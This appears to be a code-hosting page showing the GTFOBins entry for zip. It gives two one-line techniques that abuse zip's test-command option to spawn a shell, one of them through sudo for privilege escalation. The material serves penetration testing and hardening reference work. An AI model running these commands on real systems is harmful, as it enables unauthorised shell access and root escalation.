This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
acf29564cb554056c3439bbd97bc2d48abb5f28d
GTFOBins.github.io
/
_gtfobins
/
zip.md
AlessandroZ
7219385a05
add new ways
2018-08-17 17:16:09 +02:00
297 B
Raw
Blame
History
functions
functions
execute-interactive
sudo-enabled
code
echo "/bin/sh" > /tmp/run.sh chmod +x /tmp/run.sh zip z.zip * -T -TT /tmp/run.sh
code
echo "/bin/sh" > /tmp/run.sh chmod +x /tmp/run.sh sudo zip z.zip * -T -TT /tmp/run.sh
Reference in New Issue
View Git Blame
Copy Permalink